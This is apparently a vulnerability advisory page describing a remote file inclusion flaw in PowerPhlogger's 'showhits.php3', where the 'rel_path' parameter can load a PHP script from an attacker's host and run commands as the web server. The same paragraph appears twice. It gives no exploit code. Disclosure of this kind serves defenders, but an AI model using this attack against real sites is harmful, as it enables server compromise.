VULHUB ™

A vulnerability has been discovered in PowerPhlogger. This issue is present in the 'showhits.php3' script. It is possible to pass a remote attacker-specified location to the 'rel_path' parameter for included files. This may allow an attacker to execute arbitrary commands with the privileges of the webserver by including a malicious PHP script from an attacker-supplied host. It should be noted that it is not known whether or not newer versions of PowerPhlogger address this issue.

A vulnerability has been discovered in PowerPhlogger. This issue is present in the 'showhits.php3' script. It is possible to pass a remote attacker-specified location to the 'rel_path' parameter for included files. This may allow an attacker to execute arbitrary commands with the privileges of the webserver by including a malicious PHP script from an attacker-supplied host. It should be noted that it is not known whether or not newer versions of PowerPhlogger address this issue.